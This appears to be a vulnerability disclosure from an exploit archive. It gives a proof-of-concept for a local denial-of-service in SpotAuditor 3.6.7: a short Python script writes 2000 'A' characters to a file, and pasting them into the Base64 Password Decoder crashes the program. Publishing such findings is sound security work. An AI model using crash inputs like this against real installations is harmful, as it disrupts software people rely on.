SpotAuditor 3.6.7 Denial of Service

2019.02.13
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: SpotAuditor v3.6.7 - Denial of Service (PoC) # Discovery by: Rafael Pedrero # Discovery Date: 2019-01-30 # Vendor Homepage: http://www.nsauditor.com/order.html # Software Link : http://www.nsauditor.com/order.html # Tested Version: v3.6.7 # Tested on: Windows XP SP3 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run SpotAuditor.exe # 2.- copy content SpotAuditor_Crash.txt to clipboard (result from this python script) # 3.- Go to "Tools" - "Base64 Password Decoder" and paste the result in the "Base64 Encrypted Password:" textbox. # 4.- Click in Decrypt button and you will see a crash. #!/usr/bin/env python crash = "\x41" * 2000 f = open ("SpotAuditor_Crash.txt", "w") f.write(crash) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top